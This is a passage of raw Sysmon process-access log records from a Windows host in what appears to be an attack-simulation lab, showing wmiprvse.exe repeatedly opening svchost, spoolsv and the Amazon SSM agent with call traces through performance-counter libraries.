Files\Amazon\SSM\amazon-ssm-agent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+389b2|C:\Windows\SYSTEM32\pdh.dll+354d3|C:\Windows\System32\wbem\WmiPerfClass.dll+10252|C:\Windows\System32\wbem\WmiPerfClass.dll+fd5e|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000151158Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:42.201{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1A00-00000000D101}1928C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+389b2|C:\Windows\SYSTEM32\pdh.dll+354d3|C:\Windows\System32\wbem\WmiPerfClass.dll+10252|C:\Windows\System32\wbem\WmiPerfClass.dll+fd5e|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7|C:\Windows\system32\wbem\wmiprvse.exe+174e1 10341000x8000000000000000151157Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:42.201{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1900-00000000D101}1808C:\Windows\System32\spoolsv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+389b2|C:\Windows\SYSTEM32\pdh.dll+354d3|C:\Windows\System32\wbem\WmiPerfClass.dll+10252|C:\Windows\System32\wbem\WmiPerfClass.dll+fd5e|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000151156Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:42.201{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1900-00000000D101}1808C:\Windows\System32\spoolsv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+389b2|C:\Windows\SYSTEM32\pdh.dll+354d3|C:\Windows\System32\wbem\WmiPerfClass.dll+10252|C:\Windows\System32\wbem\WmiPerfClass.dll+fd5e|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7|C:\Windows\system32\wbem\wmiprvse.exe+174e1 10341000x8000000000000000151155Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:42.201{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1800-00000000D101}1548C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+389b2|C:\Windows\SYSTEM32\pdh.dll+354d3|C:\Windows\System32\wbem\WmiPerfClass.dll+10252|C:\Windows\System32\wbem\WmiPerfClass.dll+fd5e|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000151154Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:42.201{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1800-00000000D101}1548C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+389b2|C:\Windows\SYSTEM32\pdh.dll+354d3|C:\Windows\System32\wbem\WmiPerfClass.dll+10252|C:\Windows\System32\wbem\WmiPerfClass.dll+fd5e|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7|C:\Windows\system32\wbem\wmiprvse.exe+174e1 10341000x8000000000000000151153Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:42.201{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1700-00000000D101}1284C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+389b2|C:\Windows\SYSTEM32\pdh.dll+354d3|C:\Windows\System32\wbem\WmiPerfClass.dll+10252|C:\Windows\System32\wbem\WmiPerfClass.dll+fd5e|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000151152Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:42.201{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1700-00000000D101}1284C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+389b2|C:\Windows\SYSTEM32\pdh.dll+354d3|C:\Windows\System32\wbem\WmiPerfClass.dll+10252|C:\Windows\System32\wbem\WmiPerfClass.dll+fd5e|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7|C:\Windows\system32\wbem\wmiprvse.exe+174e1 10341000x8000000000000000151151Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:42.201{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1600-00000000D101}1164C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+389b2|C:\Windows\SYSTEM32\pdh.dll+354d3|C:\Windows\System32\wbem\WmiPerfClass.dll+10252|C:\Windows\System32\wbem\WmiPerfClass.dll+fd5e|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000151150Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:42.201{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1600-00000000D101}1164C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+389b2|C:\Windows\SYSTEM32\pdh.dll+354d3|C:\Windows\System32\wbem\WmiPerfClass.dll+10252|C:\Windows\System32\wbem\WmiPerfClass.dll+fd5e|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7|C:\Windows\system32\wbem\wmiprvse.exe+174e1 10341000x8000000000000000151149Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:42.201{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1500-00000000D101}1132C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+389b2|C:\Windows\SYSTEM32\pdh.dll+354d3|C:\Windows\System32\wbem\WmiPerfClass.dll+10252|C:\Windows\System32\wbem\WmiPerfClass.dll+fd5e|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000151148Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:42.201{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1500-00000000D101}1132C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+389b2|C:\Windows\SYSTEM32\pdh.dll+354d3|C:\Windows\System32\wbem\WmiPerfClass.dll+10252|C:\Windows\System32\wbem\WmiPerfClass.dll+fd5e|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7|C:\Windows\system32\wbem\wmiprvse.exe+174e1 10341000x8000000000000000151147Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:42.201{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1400-00000000D101}736C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+389b2|C:\Windows\SYSTEM32\pdh.dll+354d3|C:\Windows\System32\wbem\WmiPerfClass.dll+10252|C:\Windows\System32\wbem\WmiPerfClass.dll+fd5e|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000151146Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:42.201{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1400-00000000D101}736C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+389b2|C:\Windows\SYSTEM32\pdh.dll+354d3|C:\Windows\System32\wbem\WmiPerfClass.dll+10252|C:\Windows\System32\wbem\WmiPerfClass.dll+fd5e|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7|C:\Windows\system32\wbem\wmiprvse.exe+174e1 10341000x8000000000000000151145Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:42.201{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1300-00000000D101}1008C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3b59|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+414d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+d007|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cb01|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f5e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+27fe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+389b2|C:\Windows\SYSTEM32\pdh.dll+354d3|C:\Windows\System32\wbem\WmiPerfClass.dll+10252|C:\Windows\System32\wbem\WmiPerfClass.dll+fd5e|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7 10341000x8000000000000000151144Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 21:45:42.201{39BD8DE3-3FF8-60CA-FA06-00000000D101}54281592C:\Windows\system32\wbem\wmiprvse.exe{39BD8DE3-0F65-60CA-1300-00000000D101}1008C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c669|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c71b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2fde|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b9e|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2659|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+166b|C:\Windows\system32\mscoree.dll+1a755|C:\Windows\System32\advapi32.dll+12060|C:\Windows\System32\advapi32.dll+116b5|C:\Windows\System32\KERNELBASE.dll+23d79|C:\Windows\System32\KERNELBASE.dll+2332d|C:\Windows\SYSTEM32\pdh.dll+63ec|C:\Windows\SYSTEM32\pdh.dll+68a6|C:\Windows\SYSTEM32\pdh.dll+389b2|C:\Windows\SYSTEM32\pdh.dll+354d3|C:\Windows\System32\wbem\WmiPerfClass.dll+10252|C:\Windows\System32\wbem\WmiPerfClass.dll+fd5e|C:\Windows\System32\wbem\WmiPerfClass.dll+4bd8|C:\Windows\System32\wbem\WmiPerfClass.dll+5b0a|C:\Windows\System32\wbem\WmiPerfClass.dll+eaa6|C:\Windows\system32\wbem\wmiprvse.exe+178f7|C:\Windows\system32\wbem\wmiprvse.exe+174e1 10341000x8000000000000000151143Microsoft-Windows-Sysmon/Operationalwin-host-14.attackrange.local-2021-06-16 